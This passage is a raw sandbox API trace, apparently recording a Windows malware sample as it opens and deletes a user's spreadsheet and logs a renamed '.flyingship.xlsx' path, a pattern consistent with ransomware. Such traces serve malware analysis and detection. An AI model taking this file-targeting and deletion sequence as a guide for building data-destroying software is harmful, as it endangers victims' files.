hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.144] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ukjh6aaskg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0177.145] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.145] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.145] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0177.145] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.145] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.148] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.148] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.148] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.148] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.148] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.148] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0177.148] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.148] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.149] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.149] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.149] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", lpFilePart=0x0) returned 0x37 [0177.150] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xeeb81a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 0x90ae18 [0177.151] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ukjh6aaskg.xlsx")) returned 1 [0177.153] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xeeb81a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 0 [0177.153] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.154] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.154] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.154] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.154] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.155] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.155] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.155] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.155] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.155] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.156] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.156] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0177.156] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.156] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0177.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.157] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0177.157] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1608, lpOverlapped=0x0) returned 1 [0177.158] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0177.158] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1608, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.158] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0177.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx\r\n", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0177.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa4f8 [0177.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx\r\n", cchWideChar=69, lpMultiByteStr=0x9aa4f8, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx\r\n", lpUsedDefaultChar=0x0) returned 69 [0177.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0177.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0177.158] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x44, lpOverlapped=0x0) returned 1 [0177.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0177.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.158] CloseHandle (hObject=0x138) returned 1 [0177.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0177.161] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0177.161] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0177.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.163] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0177.163] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.163] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.163] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0177.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0177.164] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0177.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.165] HeapFree (in: hHeap=0x8a0000, 